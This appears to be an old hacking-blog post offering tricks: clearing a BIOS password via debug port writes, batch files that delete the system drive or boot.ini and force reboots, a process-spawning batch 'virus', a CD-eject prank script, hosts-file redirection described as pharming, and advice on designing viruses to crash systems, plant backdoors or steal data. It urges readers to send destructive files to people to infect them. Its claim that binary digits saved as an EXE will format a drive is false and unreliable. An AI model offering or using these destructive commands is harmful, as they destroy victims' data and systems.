JustWedding Wedding Magic Hacking Software & Game Facebook
-->

Friday, November 12, 2010

CRACK BIOS PASSWORD

here are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.

Follow the steps below:

1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!

PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..

I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….

Batch&Binary programs for formatting

Do not try it on your PC. Don’t mess around this is for educational purpose only


1.
go to notepad and type the following:
@Echo off
2. Del C:\ *.*|y save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

next,these are programs to cause system crash:

Step 1. Copy The Following In Notepad Exactly as it says[format HDD]

01001011000111110010010101010101010000011111100000

Step 2. Save As An EXE Any Name Will Do
Step 3. Send the EXE to People And Infect

try these also

format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001

Try to figure out yourself rest
can’t spoonfeed
Its working.

This is a VB Script to eject CD tray periodically like a joking virus

Type this code in notepad and save as all-files as "anyname.vbs". ==CODE below==do
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop And then open the VBS file see what will happen to your CD Drive ?

Host Redirection...

Now I'll add a little more...

This is called "Host Redirection"...

1. ping www.google.com...u will get the IP...

2. just add "" in the host file...

Ex: 10.20.3.133 www.yahoo.com

3. Now try to open yahoo...the google page will be displayed...

This method is use in PHARMING ATTACK...

Block Websties By a simple logic, Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.dbrothersatyam.blocspot.com , and that site will no longer be accessable.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.dbrothersatyam.blocspot.com
-->www.dbrothersatyam.blocspot.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
IE: 127.0.0.3 www.dbrothersatyam.blocspot.com
127.0.0.4 www.dbrothersatyam.blocspot.com
127.0.0.5 www.dbrothersatyam.blocspot.com
etc

haw can creat A Batch Virus...

1. open a notepad.
2. write:

@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop

3. save as anyname.bat.

Run the Batch file...

N.B: TO AVOID SYSTEM CRASH DELETE THE LOOP.

how can i create virus

A computer virus is a computer program that can copy itself and infect a computer.

First u have to think how would u infect the victim...

Like crash the system or malfunction a program or create a back door or steal data...

Then u need to develop the algorithm...

Like the main logic development, registry patch, stealth mode etc...

Last the coding...

U can code in C, C++, Java Script, VB etc...

But the ultimate requirement is Social Engineering...